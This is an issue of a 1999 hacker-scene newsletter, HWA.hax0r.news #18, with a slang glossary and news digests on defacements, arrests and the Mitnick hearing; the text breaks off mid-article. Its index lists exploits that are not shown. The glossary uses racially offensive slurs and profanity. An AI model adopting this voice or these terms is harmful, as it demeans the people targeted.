HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                    <=-[ HWA.hax0r.news ]-=>                            =
==========================================================================
[=HWA'99=] Number 18 Volume 1 1999 May 15th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Linus on life...

Torvalds said, "To explain human motivation, I've come up with Linus'
Law, which states the three motives that drive us: survival, social life,
and entertainment." He claimed that human history moves through each
motive in cycles. "Think of sex," he said. "First, it was used for
procreation to survive. Then it became a social bonding tool. And now
it's at its apex, as entertainment. Right now, I believe we're moving
into an entertainment society." He added that Rome had also been an
entertainment society just before its powerful empire began to implode.
And that was when things began to go wrong -- at least, ethically
speaking.

Much to his theoretical colleagues' chagrin, Torvalds revealed that he
isn't interested in human welfare, seeing as we're all doomed anyway.
He'd much rather have fun than think about all that stuff. While the
panelists and audience listened in dismay, Torvalds asserted that LINUX
was good largely because it was entertaining, and that he didn't worry
much about poor people because the world is unfair and that's just how
it is.
- NewsTrolls

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use out
of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=

                    Welcome to HWA.hax0r.news ... #18

=-----------------------------------------------------------------------=

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
***                                                             ***
***  please join to discuss or impart news on techno/phac scene ***
***  stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
***  Note that the channel isn't there to entertain you its for ***
***  you to talk to us and impart news, if you're looking for fun***
***  then do NOT join our channel try #weirdwigs or something...***
***  we're not #chatzone or #hack                               ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=

                              Issue #18

=--------------------------------------------------------------------------=
                               [ INDEX ]
=--------------------------------------------------------------------------=
     Key     Content
=--------------------------------------------------------------------------=

     00.0 .. COPYRIGHTS ......................................................
     00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
     00.2 .. SOURCES .........................................................
     00.3 .. THIS IS WHO WE ARE ..............................................
     00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
     00.5 .. THE HWA_FAQ V1.0 ................................................
     01.0 .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
     02.0 .. From the Editor..................................................
     03.0 .. Mitnick Hearing..................................................
     04.0 .. U.S Embassy and DOE sites cracked................................
     05.0 .. "The Egg" `Cracked'..............................................
     06.0 .. Student changes grades...........................................
     07.0 .. IBM's Gift To Australia's Security...............................
     08.0 .. SCREAM busted....................................................
     09.0 .. Corel Hacked.....................................................
     10.0 .. G0at Security calls it quits.....................................
     11.0 .. Guninski uncovers yet another browser bug........................
     12.0 .. Freaky to do a Macintosh related speech at Defcon7 ..............
     13.0 .. IIS 2.0 "Security" by p0lix......................................
     14.0 .. l0pht Security Advisory on MS IIS 4.0............................
     15.0 .. X-Force Security advisory on Oracle 8: Multiple file system vulnerabilities
     16.0 .. Microsoft Security Bulletin : File viewers vulnerability (MS99-13)
     17.0 .. iParty pooper....................................................
     18.0 .. Microsoft Security Bulletin: Excel 97 virus patch (MS99-14)......
     19.0 .. LISA install leaves root access OpenLinux 2.2 ...................
     20.0 .. BUGTRAQ list receives a plaque at SANS...........................
     21.0 .. White House takes server offline after hack .....................
     22.0 .. Feds to install IDS..............................................
     23.0 .. CIH damages climb in China.......................................
     24.0 .. Company claims damages from web defacement.......................
     25.0 .. .gov sites hacked in protest of embassy bombing..................
     26.0 .. Full Disclosure, the only way to go..............................
     27.0 .. NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
     28.0 .. Cure for CIH.....................................................
     29.0 .. Anonymous surfing from 303.org...................................
     30.0 .. Yugoslavia offline...............................................
     31.0 .. Spam Recycling site deals with spammers for you..................
     32.0 .. quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner...
     33.0 .. sdtcm_convert local root overflow exploit for Sparc..............
     34.0 .. lpset local root overflow exploit for solaris x86................
     35.0 .. admintool local root exploit for solaris x86 machines............
     36.0 .. dtprintinfo buffer overflow for solaris x86......................
     37.0 .. Are we running out of IP numbers? how many class c's are left??..
     27.1 .. And is webspace infinite?........................................
     38.0 .. Aibo, Sony's new robotic dog, at $2500US a pop don't dump your
             furby just yet...
     39.0 .. IBM breaks more records with denser hard disk storage............
     40.0 .. Carmack offers a bounty on Quake server DoS's and bug reports....
     41.0 .. Hack into a webserver and win $10,000 ...........................
     42.0 .. SSHD vulnerability found by JJF Hackers Team.....................
     43.0 .. Neal Stephenson author of "Snow Crash" releases new book.........
     44.0 .. Novell Netware 4.0 advisory by Nomad Mobile Research Center......
     45.0 .. Penalties for Pirates may increase...............................
     46.0 .. British Spy's site shutdown on Geocities?........................
     47.0 .. The Virus Hype, Fact or Fiction by Thejian.......................
     48.0 .. The Internet Fraud Council.......................................
     49.0 .. Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
     50.0 .. [ISN] A ban on unauthorized computer access in Japan to be enacted
     51.0 .. Virtual Vault Vulnerable.........................................
     52.0 .. PoC GalaDRiel Corel virus resurfaces.............................
     53.0 .. Web attacks a 'nuisance' says DoD................................
     54.0 .. GPS's have a Y2K problem early...................................
     55.0 .. Retinal scans?...................................................
     56.0 .. FreeBSD high speed SYNflood patch................................

=--------------------------------------------------------------------------=

     AD.S .. Post your site ads or etc here, if you can offer something in
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in. ads for other zines are ok too btw just mention us
             in yours, please remember to include links and an email contact.
             Corporate ads will be considered also and if your company
             wishes to donate to or participate in the upcoming Canc0n99
             event send in your suggestions and ads now...n.b date and
             time may be pushed back join mailing list for up to date
             information.......................................
             Current dates: Aug19th-22nd Niagara Falls... .................

     HA.HA .. Humour and puzzles ............................................

              Hey You!........................................................
              =------=........................................................

              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

     SITE.1 .. Featured site, ................................................

     H.W .. Hacked Websites ...................................................

     A.0 .. APPENDICES.........................................................

     A.1 .. PHACVW linx and references.........................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED
the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And i'm
doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

        HWA NEWS
        P.O BOX 44118
        370 MAIN ST. NORTH
        BRAMPTON, ONTARIO
        CANADA
        L6V 4H5

WANTED!: POSTCARDS! YESH!
POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~~~
reading this from some interesting places, make my day and get a mention
in the zine, send in a postcard, I realize that some places it is cost
prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard preferably one that has some scenery from your
place of residence for my collection, I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return
address not necessary, just a "hey guys being cool in Bahrain, take it
easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them. This list is not intended
to be about cracking systems or exploiting their vulnerabilities.
It is about defining, recognizing, and preventing use of security holes
and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that reproduction
of those words without your permission in any medium outside the
distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.
Schneier is president of Counterpane Systems, the author of "Applied
Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow
algorithms. He served on the board of the International Association for
Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer
on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also
if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have
to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Steven Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book.
Its almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't
be reprinted unless changed in a big way with the exception of the
following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny the any
possible attempts at eschewing obfuscation by obscuring their actual
definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18
           or <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses
           through, we're not talking Kung-Fu being none too good here,
           Buy-A-Kloo maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice
               dip, I like jalapeno pepper dip or chives sour cream and
               onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak
           using ebonics, speaking in a dark tongue ... being ereet, see
           pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty
           and doubt", usually in general media articles not high brow
           articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Steven Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
               is difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or 'can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN ..
           and HNN as a proper noun means the hackernews site proper. k? k.
           ;&

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       C  - Cracking
                       V  - Virus
                       W  - Warfare
                       A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P  - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in
           the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

*wtf     - what the fuck

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like
           state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like
to see more reader input, help me out here, whats good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral p0lix Vexx g0at security

and the #innerpulse, crew and some inhabitants of #leetchans .... although
I use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     "What is popular isn't always right, and what is right isn't
      always popular..."
                                        - FProphet '99

+++ When was the last time you backed up your important data?

++ ICQ99 network password puller

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 09:29:01 -0400
From: Dmitri Alperovitch
Subject: ICQ Password Revealer
To: BUGTRAQ@netspace.org

Hi.

A few weeks ago, it was posted that ICQ99 stores the password used to
access the ICQ network in plain-text in the .DAT files. We have written a
program that demonstrates this by parsing these .DAT files for password
and showing it to the user. It can be downloaded at
http://www.encrsoft.com/products.html#icqpass

Note: The option to save password can be turned off in ICQ's Security &
Privacy settings.

Yours truly,
Dmitri Alperovitch
Encryption Software - Developers of TSM for ICQ, an ICQ encryption add-on
http://www.encrsoft.com
dmitri@encrsoft.com

++ Friday May 14th

From HNN http://www.hackernews.com/

Zyklon Busted

contributed by Zyklon

HNN has received a report that a grand jury has indicted Zyklon.
The reports indicate that he has been indicted on various computer related
crimes and that he will be officially charged on May 24th. It is unknown at
this time exactly what the charges will be or what crimes have supposedly
been committed.

++ Japan Enacts Cracking Ban

From HNN http://www.hackernews.com/

contributed by Hisir0

A Japanese bill sponsored by the National Police Agency, the Ministry of
Posts and Telecommunications, and the Ministry of International Trade and
Industry (MITI) has been submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the Diet by the end of
June. This bill will outlaw unauthorized access to computer systems in
Japan and will carry penalties of fines and imprisonment.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/70042

++ PRIVACY ISSUES

From http://www.net-security.org/
by BHZ, Thursday 13th May 1999 on 3:38 pm CET

Do Web sites tell their visitors whether they collect personal data and how
they use it? In a separate sampling of 364 randomly selected sites, 65.7
percent gave privacy notices (much better than last year when only 14% of
sites gave those kind of notices). Read about the study on ZdNet.

http://www.zdnet.com/zdnn/stories/news/0,4586,2258012,00.html?chkpt=hpqs014

++ Don't delete Microsoft files !

From www.403-security.org
Astral 11.05.1999 12:20

Office 2000, would be well advised to avoid trying to reduce the size of
its massive footprint by deleting files to recover space. Even the most
innocuous little text files seem to have some strange and arcane purpose in
Bill's Great Scheme Of Things. For example deleting file DELME.txt is going
to cause the install procedure to start every time Office files are
executed.

Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ...
 - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No mail for sharing this week!

================================================================

@HWA

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * Issue #18 'w00ten'
     *
     *
     *
     *
     *
     *
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Mitnick Hearing
     ~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

May 10th

Mitnick Hearing Scheduled for Tomorrow

contributed by punkis

The recent release of letters claiming outrageous damages from companies
allegedly targeted by Kevin Mitnick have not pleased the prosecution.
The prosecution has filed a motion to have the defense held in contempt
for releasing the information. A hearing scheduled for tomorrow
originally scheduled to determine Kevin's future earnings potential may
also address this motion. The hearing is tomorrow (Tuesday) at 10:00 at:
U.S. Central District of California Western Division - Spring Street
Court House, 312 N. Spring Street, Los Angeles, CA 90012. If you are in
the area stop in and show Kevin some support. It should be some exciting
drama.

May 11th

This hearing was cancelled, no news on when it is to be rescheduled.

@HWA

04.0 U.S Embassy and DOE sites cracked
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

US Embassy and DOE web sites Cracked

From HNN http://www.hackernews.com/

contributed by cult hero

In response to the recent NATO bombing of the Chinese embassy in
Belgrade some people have started attacking web sites.
The US Embassy in China, The DOE, and the Department of Interior are a
few of the web sites that have had their web pages changed as a direct
result of the bombings. Most of the slogans posted on the pages are
extremely anti USA and NATO and evoke Chinese nationalism and
patriotism.

ABC News
http://www.abcnews.go.com/go/sections/world/DailyNews/kosovo_chinacyber_990509.html

Protests Reach Cyberspace

By Stacy Lu -- ABCNEWS.com

May 9, 7:51am PT — Protests over NATO's bombing of the Chinese embassy
in Belgrade have spilled into cyberspace.

Enraged hackers apparently attacked the official Web site of the U.S.
embassy in China yesterday, took over the Web sites of the Departments
of Energy and the Interior today, and established their own online
convention center at a site called "killusa."

As a result, the Department of Interior Web site on Sunday displayed
pictures of the Chinese journalists killed on Saturday after NATO
accidentally bombed the Chinese embassy in Belgrade. The Department of
Energy site read "Protest USA's Nazi action."

It was unclear whether the hacking was done by Chinese or not, though
several messages on Chinese Web sites and message boards based in China
claimed that it was.

According to Chinese news reports, hackers also launched attacks on the
official White House site, which features an automated restoration
function set to operate within five seconds of an attack.

The messages posted on attacked sites were vitriolic, patriotic and, in
some cases, poetic. One read "Down with the Yanks. The fate of the
Chinese people has reached the most critical point" — a play upon the
lyrics of the Chinese national anthem, reflecting a similar patriotic
call after the Japanese invaded China in 1937.

A poem was posted that has appeared before other civilian unrests in
China, particularly in 1976 after the death of Premier Zhou Enlai.
A rough translation: "I grieve while the wolves howl/I cry while the
beasts cheer/I shower the martyrs with my tears while unsheathing the
sword."

Communist slogans also appeared, a rarity in today's China. One of the
hacked sites declared "This hill has been taken over by the commies."

Message Boards Overflowing

Bulletin boards based in China were full of messages condemning the
U.S. and NATO's mistaken bombing of the Chinese embassy.

"You think you have a strong army without human nature and a great
number of brazen politicians just like you ... pose as the world cop
and think the world must run under your rules, your human rights, your
democracy," one message read.

The Department of Energy's home page also had a message that read, "We
are Chinese hackers that takes no cares about politics, but we can not
stand by seeing our Chinese reporters been killed."

The hackers' own site at killusa.abc.yesite.com, a repository of
hacking strategies, had nearly 1,000 messages Sunday, either reporting
